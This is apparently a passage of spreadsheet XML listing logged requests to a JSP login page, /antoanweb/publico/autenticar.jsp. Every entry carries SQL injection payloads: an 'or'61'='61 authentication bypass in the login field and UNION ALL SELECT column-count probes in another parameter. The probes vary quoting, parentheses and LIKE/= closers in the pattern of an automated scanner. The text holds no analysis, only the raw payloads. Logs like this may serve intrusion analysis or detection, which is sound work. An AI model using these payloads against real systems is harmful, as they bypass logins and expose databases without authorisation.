    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5818,5818,5818,5818,5818,5818,5818,5818,5818,5818,5818--and((('hmmk'='hmmk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459--and((('zdqe'='zdqe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect6802,6802,6802,6802,6802,6802,6802,6802,6802,6802,6802,6802,6802--and((('onti'='onti</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect4667,4667,4667,4667,4667,4667,4667,4667,4667,4667,4667,4667,4667,4667--and((('zjyw'='zjyw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102--and((('trzy'='trzy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect1805,1805,1805,1805,1805,1805,1805,1805,1805,1805,1805,1805,1805,1805,1805,1805--and((('fogg'='fogg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect662,662,662,662,662,662,662,662,662,662,662,662,662,662,662,662,662--and((('ezbn'='ezbn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect4403,4403,4403,4403,4403,4403,4403,4403,4403,4403,4403,4403,4403,4403,4403,4403,4403,4403--and((('uxih'='uxih</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect4003,4003,4003,4003,4003,4003,4003,4003,4003,4003,4003,4003,4003,4003,4003,4003,4003,4003,4003--and((('vdhl'='vdhl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect836,836,836,836,836,836,836,836,836,836,836,836,836,836,836,836,836,836,836,836--and((('vwfc'='vwfc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9366,9366,9366,9366,9366,9366,9366,9366,9366,9366,9366--and'kvth'='kvth</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect109,109,109,109,109,109,109,109,109,109,109,109--and'mxmx'='mxmx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5160,5160,5160,5160,5160,5160,5160,5160,5160,5160,5160,5160,5160--and'ufqc'='ufqc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3971,3971,3971,3971,3971,3971,3971,3971,3971,3971,3971,3971,3971,3971--and'wwtb'='wwtb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722--and'cbhe'='cbhe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56--and'pczt'='pczt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4602,4602,4602,4602,4602,4602,4602,4602,4602,4602,4602,4602,4602,4602,4602,4602,4602--and'gzxx'='gzxx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5342,5342,5342,5342,5342,5342,5342,5342,5342,5342,5342,5342,5342,5342,5342,5342,5342,5342--and'mqzu'='mqzu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1081,1081,1081,1081,1081,1081,1081,1081,1081,1081,1081,1081,1081,1081,1081,1081,1081,1081,1081--and'ngbr'='ngbr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9401,9401,9401,9401,9401,9401,9401,9401,9401,9401,9401,9401,9401,9401,9401,9401,9401,9401,9401,9401--and'wksj'='wksj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect9180,9180,9180,9180,9180,9180,9180,9180,9180,9180,9180--and('knaa'like'knaa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575--and('vmdm'like'vmdm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8108,8108,8108,8108,8108,8108,8108,8108,8108,8108,8108,8108,8108--and('dhki'like'dhki</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6568,6568,6568,6568,6568,6568,6568,6568,6568,6568,6568,6568,6568,6568--and('luxa'like'luxa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect236,236,236,236,236,236,236,236,236,236,236,236,236,236,236--and('zxmf'like'zxmf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936--and('axlk'like'axlk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7613,7613,7613,7613,7613,7613,7613,7613,7613,7613,7613,7613,7613,7613,7613,7613,7613--and('juvh'like'juvh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3795,3795,3795,3795,3795,3795,3795,3795,3795,3795,3795,3795,3795,3795,3795,3795,3795,3795--and('lomo'like'lomo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5352,5352,5352,5352,5352,5352,5352,5352,5352,5352,5352,5352,5352,5352,5352,5352,5352,5352,5352--and('ebxs'like'ebxs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6828,6828,6828,6828,6828,6828,6828,6828,6828,6828,6828,6828,6828,6828,6828,6828,6828,6828,6828,6828--and('iows'like'iows</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect4480,4480,4480,4480,4480,4480,4480,4480,4480,4480,4480--and(('lvta'like'lvta</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect6606,6606,6606,6606,6606,6606,6606,6606,6606,6606,6606,6606--and(('ikbb'like'ikbb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect3535,3535,3535,3535,3535,3535,3535,3535,3535,3535,3535,3535,3535--and(('fefp'like'fefp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2882,2882,2882,2882,2882,2882,2882,2882,2882,2882,2882,2882,2882,2882--and(('lhir'like'lhir</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect4702,4702,4702,4702,4702,4702,4702,4702,4702,4702,4702,4702,4702,4702,4702--and(('dhzg'like'dhzg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect9486,9486,9486,9486,9486,9486,9486,9486,9486,9486,9486,9486,9486,9486,9486,9486--and(('iecm'like'iecm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335--and(('negj'like'negj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846--and(('usck'like'usck</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect1028,1028,1028,1028,1028,1028,1028,1028,1028,1028,1028,1028,1028,1028,1028,1028,1028,1028,1028--and(('mjjd'like'mjjd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect7278,7278,7278,7278,7278,7278,7278,7278,7278,7278,7278,7278,7278,7278,7278,7278,7278,7278,7278,7278--and(('uolk'like'uolk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect115,115,115,115,115,115,115,115,115,115,115--and((('wrwz'like'wrwz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3730,3730,3730,3730,3730,3730,3730,3730,3730,3730,3730,3730--and((('dhls'like'dhls</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect6978,6978,6978,6978,6978,6978,6978,6978,6978,6978,6978,6978,6978--and((('oivo'like'oivo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414--and((('trzn'like'trzn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect4402,4402,4402,4402,4402,4402,4402,4402,4402,4402,4402,4402,4402,4402,4402--and((('qsiw'like'qsiw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097--and((('mbwz'like'mbwz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect2428,2428,2428,2428,2428,2428,2428,2428,2428,2428,2428,2428,2428,2428,2428,2428,2428--and((('osby'like'osby</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect9741,9741,9741,9741,9741,9741,9741,9741,9741,9741,9741,9741,9741,9741,9741,9741,9741,9741--and((('yosj'like'yosj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3231,3231,3231,3231,3231,3231,3231,3231,3231,3231,3231,3231,3231,3231,3231,3231,3231,3231,3231--and((('kmat'like'kmat</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5282,5282,5282,5282,5282,5282,5282,5282,5282,5282,5282,5282,5282,5282,5282,5282,5282,5282,5282,5282--and((('ywoc'like'ywoc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect179,179,179,179,179,179,179,179,179,179,179--and'yqkl'like'yqkl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect20,20,20,20,20,20,20,20,20,20,20,20--and'oqoj'like'oqoj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991--and'sfkv'like'sfkv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459--and'ylhv'like'ylhv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7704,7704,7704,7704,7704,7704,7704,7704,7704,7704,7704,7704,7704,7704,7704--and'ffzc'like'ffzc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2691,2691,2691,2691,2691,2691,2691,2691,2691,2691,2691,2691,2691,2691,2691,2691--and'erql'like'erql</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7332,7332,7332,7332,7332,7332,7332,7332,7332,7332,7332,7332,7332,7332,7332,7332,7332--and'qnyr'like'qnyr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8147,8147,8147,8147,8147,8147,8147,8147,8147,8147,8147,8147,8147,8147,8147,8147,8147,8147--and'njhe'like'njhe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8160,8160,8160,8160,8160,8160,8160,8160,8160,8160,8160,8160,8160,8160,8160,8160,8160,8160,8160--and'yygi'like'yygi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6154,6154,6154,6154,6154,6154,6154,6154,6154,6154,6154,6154,6154,6154,6154,6154,6154,6154,6154,6154--and'wfrg'like'wfrg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4994,4994,4994,4994,4994,4994,4994,4994,4994,4994,4994--and("dubp"="dubp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect854,854,854,854,854,854,854,854,854,854,854,854--and("cpog"="cpog</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786--and("wbef"="wbef</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect2554,2554,2554,2554,2554,2554,2554,2554,2554,2554,2554,2554,2554,2554--and("pzph"="pzph</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3975,3975,3975,3975,3975,3975,3975,3975,3975,3975,3975,3975,3975,3975,3975--and("ryex"="ryex</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect8107,8107,8107,8107,8107,8107,8107,8107,8107,8107,8107,8107,8107,8107,8107,8107--and("zztj"="zztj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6412,6412,6412,6412,6412,6412,6412,6412,6412,6412,6412,6412,6412,6412,6412,6412,6412--and("eezq"="eezq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6926,6926,6926,6926,6926,6926,6926,6926,6926,6926,6926,6926,6926,6926,6926,6926,6926,6926--and("nzae"="nzae</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4151,4151,4151,4151,4151,4151,4151,4151,4151,4151,4151,4151,4151,4151,4151,4151,4151,4151,4151--and("bwjm"="bwjm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect2983,2983,2983,2983,2983,2983,2983,2983,2983,2983,2983,2983,2983,2983,2983,2983,2983,2983,2983,2983--and("peeq"="peeq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect2215,2215,2215,2215,2215,2215,2215,2215,2215,2215,2215--and(("mvug"="mvug</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5465,5465,5465,5465,5465,5465,5465,5465,5465,5465,5465,5465--and(("ofza"="ofza</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect3115,3115,3115,3115,3115,3115,3115,3115,3115,3115,3115,3115,3115--and(("nzri"="nzri</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect6707,6707,6707,6707,6707,6707,6707,6707,6707,6707,6707,6707,6707,6707--and(("kbif"="kbif</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect2215,2215,2215,2215,2215,2215,2215,2215,2215,2215,2215,2215,2215,2215,2215--and(("ogkr"="ogkr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5991,5991,5991,5991,5991,5991,5991,5991,5991,5991,5991,5991,5991,5991,5991,5991--and(("nqan"="nqan</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449--and(("knmz"="knmz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect9209,9209,9209,9209,9209,9209,9209,9209,9209,9209,9209,9209,9209,9209,9209,9209,9209,9209--and(("kjgp"="kjgp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect625,625,625,625,625,625,625,625,625,625,625,625,625,625,625,625,625,625,625--and(("zukp"="zukp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect1866,1866,1866,1866,1866,1866,1866,1866,1866,1866,1866,1866,1866,1866,1866,1866,1866,1866,1866,1866--and(("xnzt"="xnzt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect1430,1430,1430,1430,1430,1430,1430,1430,1430,1430,1430--and((("mnyu"="mnyu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087--and((("qdhe"="qdhe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8039,8039,8039,8039,8039,8039,8039,8039,8039,8039,8039,8039,8039--and((("zcmj"="zcmj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect5759,5759,5759,5759,5759,5759,5759,5759,5759,5759,5759,5759,5759,5759--and((("izlr"="izlr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6307,6307,6307,6307,6307,6307,6307,6307,6307,6307,6307,6307,6307,6307,6307--and((("tzto"="tzto</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6116,6116,6116,6116,6116,6116,6116,6116,6116,6116,6116,6116,6116,6116,6116,6116--and((("uqgu"="uqgu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect9711,9711,9711,9711,9711,9711,9711,9711,9711,9711,9711,9711,9711,9711,9711,9711,9711--and((("onpx"="onpx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect7566,7566,7566,7566,7566,7566,7566,7566,7566,7566,7566,7566,7566,7566,7566,7566,7566,7566--and((("fmlo"="fmlo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect5445,5445,5445,5445,5445,5445,5445,5445,5445,5445,5445,5445,5445,5445,5445,5445,5445,5445,5445--and((("lxed"="lxed</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect9666,9666,9666,9666,9666,9666,9666,9666,9666,9666,9666,9666,9666,9666,9666,9666,9666,9666,9666,9666--and((("uewu"="uewu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7237,7237,7237,7237,7237,7237,7237,7237,7237,7237,7237--and"nsdi"="nsdi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8293,8293,8293,8293,8293,8293,8293,8293,8293,8293,8293,8293--and"okkv"="okkv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641--and"ylfl"="ylfl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318--and"khxe"="khxe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676--and"ebjh"="ebjh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9238,9238,9238,9238,9238,9238,9238,9238,9238,9238,9238,9238,9238,9238,9238,9238--and"xfxt"="xfxt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5458,5458,5458,5458,5458,5458,5458,5458,5458,5458,5458,5458,5458,5458,5458,5458,5458--and"ccys"="ccys</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect884,884,884,884,884,884,884,884,884,884,884,884,884,884,884,884,884,884--and"znsr"="znsr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8559,8559,8559,8559,8559,8559,8559,8559,8559,8559,8559,8559,8559,8559,8559,8559,8559,8559,8559--and"jiey"="jiey</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060--and"ebbm"="ebbm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838--and("ewvp"like"ewvp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4005,4005,4005,4005,4005,4005,4005,4005,4005,4005,4005,4005--and("fbsz"like"fbsz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect9373,9373,9373,9373,9373,9373,9373,9373,9373,9373,9373,9373,9373--and("dccc"like"dccc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6743,6743,6743,6743,6743,6743,6743,6743,6743,6743,6743,6743,6743,6743--and("iwkr"like"iwkr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3890,3890,3890,3890,3890,3890,3890,3890,3890,3890,3890,3890,3890,3890,3890--and("kawp"like"kawp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4893,4893,4893,4893,4893,4893,4893,4893,4893,4893,4893,4893,4893,4893,4893,4893--and("xgxg"like"xgxg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6944,6944,6944,6944,6944,6944,6944,6944,6944,6944,6944,6944,6944,6944,6944,6944,6944--and("aajd"like"aajd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1476,1476,1476,1476,1476,1476,1476,1476,1476,1476,1476,1476,1476,1476,1476,1476,1476,1476--and("nbqz"like"nbqz</t>
  </si>
  <si>
